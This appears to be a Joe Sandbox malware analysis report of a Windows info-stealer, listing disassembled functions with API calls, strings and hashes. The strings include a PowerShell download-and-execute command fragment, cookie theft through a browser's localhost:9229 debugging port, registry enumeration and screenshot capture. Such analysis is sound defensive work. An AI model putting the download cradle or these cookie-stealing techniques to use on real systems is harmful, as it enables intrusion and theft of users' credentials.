                                  • Opcode Fuzzy Hash: 6b0d5864ac217c4d70ea77cf660bda3ff39bc5a0b4eecc52e57dc71444bcd5da
                                  • Instruction Fuzzy Hash: CE712B71E40268ABD722EB60DC46FEE7378AF48700F1445A9B7199B1C0DFB49E848B64
                                  APIs
                                  • lstrcpy.KERNEL32 ref: 003FABCF
                                  • lstrlen.KERNEL32(011B0358), ref: 003FABE5
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003FAC0D
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 003FAC18
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003FAC41
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003FAC84
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 003FAC8E
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003FACB7
                                  • lstrlen.KERNEL32(00414AD4), ref: 003FACD1
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003FACF3
                                  • lstrcat.KERNEL32(00000000,00414AD4), ref: 003FACFF
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003FAD28
                                  • lstrlen.KERNEL32(00414AD4), ref: 003FAD3A
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003FAD5C
                                  • lstrcat.KERNEL32(00000000,00414AD4), ref: 003FAD68
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003FAD91
                                  • lstrlen.KERNEL32(011B02E0), ref: 003FADA7
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003FADCF
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 003FADDA
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003FAE03
                                  • lstrcpy.KERNEL32(00000000,?), ref: 003FAE3F
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 003FAE49
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003FAE6F
                                  • lstrlen.KERNEL32(00000000), ref: 003FAE85
                                  • lstrcpy.KERNEL32(00000000,011B0400), ref: 003FAEB8
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2235656893.00000000003E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                  • Associated: 00000000.00000002.2235640432.00000000003E0000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2235656893.0000000000417000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2235656893.000000000046E000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2235656893.0000000000476000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2235656893.000000000048F000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2235656893.0000000000618000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2235837924.000000000062A000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2235862582.000000000062C000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2235862582.00000000007B8000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2235862582.0000000000895000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2235862582.00000000008BE000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2235862582.00000000008C7000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2235862582.00000000008D4000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2236225795.00000000008D5000.00000080.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2236372652.0000000000A72000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2236397868.0000000000A73000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_3e0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$lstrcat$lstrlen
                                  • String ID: f
                                  • API String ID: 2762123234-1993550816
                                  • Opcode ID: e595ef2bfe912824a7791b9452ff55055a275a94bb6e818240755a95f93f479d
                                  • Instruction ID: b4dd6e029a6e7eaa1071c92437696a50a6712b3786a7f7d6dcedd981bc9601a8
                                  • Opcode Fuzzy Hash: e595ef2bfe912824a7791b9452ff55055a275a94bb6e818240755a95f93f479d
                                  • Instruction Fuzzy Hash: 1EB1B17191092A9FCB23EF64CC49ABF73BAAF00301F094525B909DB2A1DB74DD51CB91
                                  APIs
                                  • LoadLibraryA.KERNEL32(ws2_32.dll,?,003F72A4), ref: 004047E6
                                  • GetProcAddress.KERNEL32(00000000,connect), ref: 004047FC
                                  • GetProcAddress.KERNEL32(00000000,WSAStartup), ref: 0040480D
                                  • GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 0040481E
                                  • GetProcAddress.KERNEL32(00000000,htons), ref: 0040482F
                                  • GetProcAddress.KERNEL32(00000000,WSACleanup), ref: 00404840
                                  • GetProcAddress.KERNEL32(00000000,recv), ref: 00404851
                                  • GetProcAddress.KERNEL32(00000000,socket), ref: 00404862
                                  • GetProcAddress.KERNEL32(00000000,freeaddrinfo), ref: 00404873
                                  • GetProcAddress.KERNEL32(00000000,closesocket), ref: 00404884
                                  • GetProcAddress.KERNEL32(00000000,send), ref: 00404895
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2235656893.00000000003E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                  • Associated: 00000000.00000002.2235640432.00000000003E0000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2235656893.0000000000417000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2235656893.000000000046E000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2235656893.0000000000476000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2235656893.000000000048F000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2235656893.0000000000618000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2235837924.000000000062A000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2235862582.000000000062C000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2235862582.00000000007B8000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2235862582.0000000000895000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2235862582.00000000008BE000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2235862582.00000000008C7000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2235862582.00000000008D4000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2236225795.00000000008D5000.00000080.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2236372652.0000000000A72000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2236397868.0000000000A73000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_3e0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: AddressProc$LibraryLoad
                                  • String ID: WSACleanup$WSAStartup$closesocket$connect$freeaddrinfo$getaddrinfo$htons$recv$send$socket$ws2_32.dll
                                  • API String ID: 2238633743-3087812094
                                  APIs
                                  • lstrcpy.KERNEL32(00000000,0040CFEC), ref: 003FBE53
                                  • lstrcpy.KERNEL32(00000000,0040CFEC), ref: 003FBE86
                                  • lstrlen.KERNEL32(-nop -c "iex(New-Object Net.WebClient).DownloadString('), ref: 003FBE91
                                  • lstrcpy.KERNEL32(00000000,?), ref: 003FBEB1
                                  • lstrcat.KERNEL32(00000000,-nop -c "iex(New-Object Net.WebClient).DownloadString('), ref: 003FBEBD
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003FBEE0
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 003FBEEB
                                  • lstrlen.KERNEL32(')"), ref: 003FBEF6
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003FBF13
                                  • lstrcat.KERNEL32(00000000,')"), ref: 003FBF1F
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003FBF46
                                  • lstrlen.KERNEL32(C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe), ref: 003FBF66
                                  • lstrcpy.KERNEL32(00000000,?), ref: 003FBF88
                                  • lstrcat.KERNEL32(00000000,C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe), ref: 003FBF94
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003FBFBA
                                  • ShellExecuteEx.SHELL32(?), ref: 003FC00C
                                  Strings
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_3e0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$lstrcat$lstrlen$ExecuteShell
                                  • String ID: ')"$-nop -c "iex(New-Object Net.WebClient).DownloadString('$<$C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                  • API String ID: 4016326548-898575020
                                  APIs
                                  • lstrcpy.KERNEL32(00000000,0040CFEC), ref: 0040184F
                                  • lstrlen.KERNEL32(01196D30), ref: 00401860
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00401887
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 00401892
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 004018C1
                                  • lstrlen.KERNEL32(00414FA0), ref: 004018D3
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 004018F4
                                  • lstrcat.KERNEL32(00000000,00414FA0), ref: 00401900
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 0040192F
                                  • lstrlen.KERNEL32(01196D60), ref: 00401945
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 0040196C
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 00401977
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 004019A6
                                  • lstrlen.KERNEL32(00414FA0), ref: 004019B8
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 004019D9
                                  • lstrcat.KERNEL32(00000000,00414FA0), ref: 004019E5
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00401A14
                                  • lstrlen.KERNEL32(01196D80), ref: 00401A2A
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00401A51
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 00401A5C
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00401A8B
                                  • lstrlen.KERNEL32(01196D90), ref: 00401AA1
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00401AC8
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 00401AD3
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00401B02
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_3e0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$lstrcatlstrlen
                                  • String ID:
                                  • API String ID: 1049500425-0
                                  APIs
                                  • lstrcpy.KERNEL32(00000000,?), ref: 003F4793
                                  • LocalAlloc.KERNEL32(00000040,?), ref: 003F47C5
                                  • lstrcpy.KERNEL32(00000000,0040CFEC), ref: 003F4812
                                  • lstrlen.KERNEL32(00414B60), ref: 003F481D
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003F483A
                                  • lstrcat.KERNEL32(00000000,00414B60), ref: 003F4846
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003F486B
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003F4898
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 003F48A3
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003F48CA
                                  • StrStrA.SHLWAPI(?,00000000), ref: 003F48DC
                                  • lstrlen.KERNEL32(?), ref: 003F48F0
                                  • lstrcpy.KERNEL32(00000000,0040CFEC), ref: 003F4931
                                  • lstrcpy.KERNEL32(00000000,?), ref: 003F49B8
                                  • lstrcpy.KERNEL32(00000000,?), ref: 003F49E1
                                  • lstrcpy.KERNEL32(00000000,?), ref: 003F4A0A
                                  • lstrcpy.KERNEL32(00000000,?), ref: 003F4A30
                                  • lstrcpy.KERNEL32(00000000,?), ref: 003F4A5D
                                  Strings
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_3e0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$lstrcatlstrlen$AllocLocal
                                  • String ID: ^userContextId=4294967295$moz-extension+++
                                  • API String ID: 4107348322-3310892237
                                  APIs
                                    • Part of subcall function 003E90C0: InternetOpenA.WININET(0040CFEC,00000001,00000000,00000000,00000000), ref: 003E90DF
                                    • Part of subcall function 003E90C0: InternetOpenUrlA.WININET(00000000,http://localhost:9229/json,00000000,00000000,80000000,00000000), ref: 003E90FC
                                    • Part of subcall function 003E90C0: InternetCloseHandle.WININET(00000000), ref: 003E9109
                                  • strlen.MSVCRT ref: 003E92E1
                                  • strlen.MSVCRT ref: 003E92FA
                                    • Part of subcall function 003E8980: std::_Xinvalid_argument.LIBCPMT ref: 003E8996
                                  • strlen.MSVCRT ref: 003E9399
                                  • strlen.MSVCRT ref: 003E93E6
                                  • lstrcat.KERNEL32(?,cookies), ref: 003E9547
                                  • lstrcat.KERNEL32(?,00411794), ref: 003E9559
                                  • lstrcat.KERNEL32(?,?), ref: 003E956A
                                  • lstrcat.KERNEL32(?,00414B98), ref: 003E957C
                                  • lstrcat.KERNEL32(?,?), ref: 003E958D
                                  • lstrcat.KERNEL32(?,.txt), ref: 003E959F
                                  • lstrlen.KERNEL32(?), ref: 003E95B6
                                  • lstrlen.KERNEL32(?), ref: 003E95DB
                                  • lstrcpy.KERNEL32(00000000,?), ref: 003E9614
                                  Strings
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_3e0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcat$strlen$Internet$Openlstrlen$CloseHandleXinvalid_argumentlstrcpystd::_
                                  • String ID: .txt$/devtools$cookies$localhost$ws://localhost:9229
                                  • API String ID: 1201316467-3542011879
                                  APIs
                                  • memset.MSVCRT ref: 003FD9A1
                                  • memset.MSVCRT ref: 003FD9B3
                                  • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 003FD9DB
                                  • lstrcpy.KERNEL32(00000000,?), ref: 003FDA0E
                                  • lstrcat.KERNEL32(?,00000000), ref: 003FDA1C
                                  • lstrcat.KERNEL32(?,011B04A8), ref: 003FDA36
                                  • lstrcat.KERNEL32(?,?), ref: 003FDA4A
                                  • lstrcat.KERNEL32(?,011AED80), ref: 003FDA5E
                                  • lstrcpy.KERNEL32(00000000,?), ref: 003FDA8E
                                  • GetFileAttributesA.KERNEL32(00000000), ref: 003FDA95
                                  • lstrcpy.KERNEL32(00000000,0040CFEC), ref: 003FDAFE
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_3e0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcat$lstrcpy$memset$AttributesFileFolderPath
                                  • String ID:
                                  • API String ID: 2367105040-0
                                  APIs
                                  • lstrcpy.KERNEL32(00000000,0040CFEC), ref: 003EB330
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003EB37E
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003EB3A9
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 003EB3B1
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003EB3D9
                                  • lstrlen.KERNEL32(00414C50), ref: 003EB450
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003EB474
                                  • lstrcat.KERNEL32(00000000,00414C50), ref: 003EB480
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003EB4A9
                                  • lstrlen.KERNEL32(00000000), ref: 003EB52D
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003EB557
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 003EB55F
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003EB587
                                  • lstrlen.KERNEL32(00414AD4), ref: 003EB5FE
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003EB622
                                  • lstrcat.KERNEL32(00000000,00414AD4), ref: 003EB62E
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003EB65E
                                  • lstrlen.KERNEL32(?), ref: 003EB767
                                  • lstrlen.KERNEL32(?), ref: 003EB776
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003EB79E
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_3e0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$lstrlen$lstrcat
                                  • String ID:
                                  • API String ID: 2500673778-0
                                  • Opcode ID: 6a3a8ce56acc9d48eceb7f7ef358e24203e3dbaf04daf096f2b7b9bd4b60f61c
                                  • Instruction ID: d9a51706c180a8d1d97c27056f3d2033ea42273e9028022e6419cef2f6095e28
                                  • Instruction Fuzzy Hash: 0C028230A01265CFCB27DF66C989BABF7B5AF40704F198269E4099B2E1D771DC42CB90
                                  APIs
                                    • Part of subcall function 004071E0: lstrcpy.KERNEL32(00000000,ERROR), ref: 004071FE
                                  • RegOpenKeyExA.ADVAPI32(?,011AC100,00000000,00020019,?), ref: 004037BD
                                  • RegEnumKeyExA.ADVAPI32(?,?,?,?,00000000,00000000,00000000,00000000), ref: 004037F7
                                  • wsprintfA.USER32 ref: 00403822
                                  • RegOpenKeyExA.ADVAPI32(?,?,00000000,00020019,?), ref: 00403840
                                  • RegCloseKey.ADVAPI32(?), ref: 0040384E
                                  • RegCloseKey.ADVAPI32(?), ref: 00403858
                                  • RegQueryValueExA.ADVAPI32(?,011B0250,00000000,000F003F,?,?), ref: 004038A1
                                  • lstrlen.KERNEL32(?), ref: 004038B6
                                  • RegQueryValueExA.ADVAPI32(?,011B0310,00000000,000F003F,?,00000400), ref: 00403927
                                  • RegCloseKey.ADVAPI32(?), ref: 00403972
                                  • RegCloseKey.ADVAPI32(?), ref: 00403989
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2235656893.00000000003E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_3e0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Close$OpenQueryValue$Enumlstrcpylstrlenwsprintf
                                  • String ID: - $%s\%s$?
                                  • API String ID: 13140697-3278919252
                                  • Opcode ID: ebd26e1e2f66de5366cda43bc64cdb722f872cbb5ad9e4d9118251aed817c11c
                                  • Instruction ID: a34c7b01e72f70baf1425b426d841e61fa37e636740a9a96e53d5cda63d94ee5
                                  • Instruction Fuzzy Hash: 4C918DB2D002089FCB10DF95D9809DEBBB9FB48311F14816EE509BB291D735AE42CBA4
                                  APIs
                                  • InternetOpenA.WININET(0040CFEC,00000001,00000000,00000000,00000000), ref: 003E90DF
                                  • InternetOpenUrlA.WININET(00000000,http://localhost:9229/json,00000000,00000000,80000000,00000000), ref: 003E90FC
                                  • InternetCloseHandle.WININET(00000000), ref: 003E9109
                                  • InternetReadFile.WININET(?,?,?,00000000), ref: 003E9166
                                  • InternetReadFile.WININET(00000000,?,00001000,?), ref: 003E9197
                                  • InternetCloseHandle.WININET(00000000), ref: 003E91A2
                                  • InternetCloseHandle.WININET(00000000), ref: 003E91A9
                                  • strlen.MSVCRT ref: 003E91BA
                                  • strlen.MSVCRT ref: 003E91ED
                                  • strlen.MSVCRT ref: 003E922E
                                  • strlen.MSVCRT ref: 003E924C
                                    • Part of subcall function 003E8980: std::_Xinvalid_argument.LIBCPMT ref: 003E8996
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2235656893.00000000003E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_3e0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Internet$strlen$CloseHandle$FileOpenRead$Xinvalid_argumentstd::_
                                  • String ID: "webSocketDebuggerUrl":$"ws://$http://localhost:9229/json
                                  • API String ID: 1530259920-2144369209
                                  • Opcode ID: 75b68257f5d742b59c460e158bde2dbb5eb723a797bdb3235a93862a6c001899
                                  • Instruction ID: 02ed76d2760dcf6393566e759f30f9b2e68b5fbf6c0cbfc4c6290c44557837bc
                                  • Instruction Fuzzy Hash: 83511471A00209ABDB10DFA9DC45BEEB7BADB48310F14056AF504E72C0DBB4EA4487A5
                                  APIs
                                  • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,?,?), ref: 004016A1
                                  • lstrcpy.KERNEL32(00000000,0119A7D8), ref: 004016CC
                                  • lstrlen.KERNEL32(?), ref: 004016D9
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 004016F6
                                  • lstrcat.KERNEL32(00000000,?), ref: 00401704
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 0040172A
                                  • lstrlen.KERNEL32(011AFFA0), ref: 0040173F
                                  • lstrcpy.KERNEL32(00000000,?), ref: 00401762
                                  • lstrcat.KERNEL32(00000000,011AFFA0), ref: 0040176A
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00401792
                                  • ShellExecuteEx.SHELL32(?), ref: 004017CD
                                  • ExitProcess.KERNEL32 ref: 00401803
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2235656893.00000000003E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_3e0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$lstrcatlstrlen$ExecuteExitFileModuleNameProcessShell
                                  • String ID: <
                                  • API String ID: 3579039295-4251816714
                                  • Opcode ID: 628332a43d1889205ecfa3d76c60dac61ab26086b0a6a45b622152ab51d564d5
                                  • Instruction ID: 3707f99e78a314aaf3b2ce33182cf9b4afbd173721e217d04ea13e4d21a3792d
                                  • Instruction Fuzzy Hash: B8513D71901269AFDB11DFA5DC84ADFB7FEAF48300F049136A505E73A1DB74AE018B94
                                  APIs
                                  • lstrcpy.KERNEL32(00000000,?), ref: 003FEFE4
                                  • lstrcpy.KERNEL32(00000000,?), ref: 003FF012
                                  • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 003FF026
                                  • lstrlen.KERNEL32(00000000), ref: 003FF035
                                  • LocalAlloc.KERNEL32(00000040,00000001), ref: 003FF053
                                  • StrStrA.SHLWAPI(00000000,?), ref: 003FF081
                                  • lstrlen.KERNEL32(?), ref: 003FF094
                                  • lstrlen.KERNEL32(00000000), ref: 003FF0B2
                                  • lstrcpy.KERNEL32(00000000,ERROR), ref: 003FF0FF
                                  • lstrcpy.KERNEL32(00000000,ERROR), ref: 003FF13F
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2235656893.00000000003E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_3e0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$lstrlen$AllocLocal
                                  • String ID: ERROR
                                  • API String ID: 1803462166-2861137601
                                  • Opcode ID: 39f35adc7335fbabc636cab2ff75d2675bffdfa39fbc12929c8befaccd14f956
                                  • Instruction ID: 2b9be2e85d231dc20192d449e1a81bfe7d995da93fd9b377d79761f4a058224f
                                  • Instruction Fuzzy Hash: C6519D329102599FCB23AF35DC49ABF77A9AF44740F0A5269FD069B252DF70DC018B90
                                  APIs
                                  • GetEnvironmentVariableA.KERNEL32(011A8B28,00619BD8,0000FFFF), ref: 003EA026
                                  • lstrcpy.KERNEL32(00000000,0040CFEC), ref: 003EA053
                                  • lstrlen.KERNEL32(00619BD8), ref: 003EA060
                                  • lstrcpy.KERNEL32(00000000,00619BD8), ref: 003EA08A
                                  • lstrlen.KERNEL32(00414C4C), ref: 003EA095
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003EA0B2
                                  • lstrcat.KERNEL32(00000000,00414C4C), ref: 003EA0BE
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003EA0E4
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 003EA0EF
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003EA114
                                  • SetEnvironmentVariableA.KERNEL32(011A8B28,00000000), ref: 003EA12F
                                  • LoadLibraryA.KERNEL32(011963B8), ref: 003EA143
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2235656893.00000000003E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_3e0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$EnvironmentVariablelstrcatlstrlen$LibraryLoad
                                  • String ID:
                                  • API String ID: 2929475105-0
                                  • Opcode ID: b039cc5b3234fbe0b027f480838e8cefe23c303764c5e9cf27c4a144d56aa10d
                                  • Instruction ID: 357cf7775d1f376ab5d6cc6016050c394863fe2830ec39307e7bf5a5cb281c38
                                  • Instruction Fuzzy Hash: 7A910730600A60CFD7329FB6DC44AA737B6EB54704F469619E5059B2E2EFB5EC40CB92
                                  APIs
                                  • lstrcpy.KERNEL32(00000000,0040CFEC), ref: 003FC8A2
                                  • lstrcpy.KERNEL32(00000000,0040CFEC), ref: 003FC8D1
                                  • lstrlen.KERNEL32(00000000), ref: 003FC8FC
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003FC932
                                  • StrCmpCA.SHLWAPI(00000000,00414C3C), ref: 003FC943
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2235656893.00000000003E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_3e0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$lstrlen
                                  • String ID:
                                  • API String ID: 367037083-0
                                  • Opcode ID: 2acc5770ca3dfbfedab4c7c59c6a7953e1f366384cc512e7f927cc80386b9505
                                  • Instruction ID: 22ddfb218498c7c9a1760dbcb7f2f5abc96609a7ac6d3025058715749bb7e351
                                  • Instruction Fuzzy Hash: 6A61F571D6022E9BCF12DFB5CA45AFF7BB8BF09340F056669E901E7241D77499018BA0
                                  APIs
                                  • memset.MSVCRT ref: 0040451A
                                  • GetProcessHeap.KERNEL32(00000000,000000FA,00000000,?,?,?,003F4F39), ref: 00404545
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 0040454C
                                  • wsprintfW.USER32 ref: 0040455B
                                  • OpenProcess.KERNEL32(00001001,00000000,?,?), ref: 004045CA
                                  • TerminateProcess.KERNEL32(00000000,00000000,?,?), ref: 004045D9
                                  • CloseHandle.KERNEL32(00000000,?,?), ref: 004045E0
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2235656893.00000000003E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_3e0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Process$Heap$AllocateCloseHandleOpenTerminatememsetwsprintf
                                  • String ID: 9O?$%hs$9O?
                                  • API String ID: 3729781310-603848071
                                  • Opcode ID: dd7c7bf093b23909dd1f630d2ae005ec159efbe995383b21abe9ac696592c3aa
                                  • Instruction ID: d3ff1c69a8a70ed81f16582ef68c754677de820195cc8d042596073032452dcf
                                  • Instruction Fuzzy Hash: E5316172A00205BFDB10DBE4DC45FDE7779BF49701F14406AFA05E7180DB746A418BA9
                                  APIs
                                  • CreateStreamOnHGlobal.COMBASE(00000000,00000001,00400CF0), ref: 00404276
                                  • GetDesktopWindow.USER32 ref: 00404280
                                  • GetWindowRect.USER32(00000000,?), ref: 0040428D
                                  • SelectObject.GDI32(00000000,00000000), ref: 004042BF
                                  • GetHGlobalFromStream.COMBASE(00400CF0,?), ref: 00404336
                                  • GlobalLock.KERNEL32(?), ref: 00404340
                                  • GlobalSize.KERNEL32(?), ref: 0040434D
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2235656893.00000000003E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                   • Associated: 00000000.00000002.2235640432.00000000003E0000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2235656893.0000000000417000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2235656893.000000000046E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2235656893.0000000000476000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2235656893.000000000048F000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2235656893.0000000000618000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2235837924.000000000062A000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2235862582.000000000062C000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2235862582.00000000007B8000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2235862582.0000000000895000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2235862582.00000000008BE000.00000040.00000001.01000000.00000003.sdmp
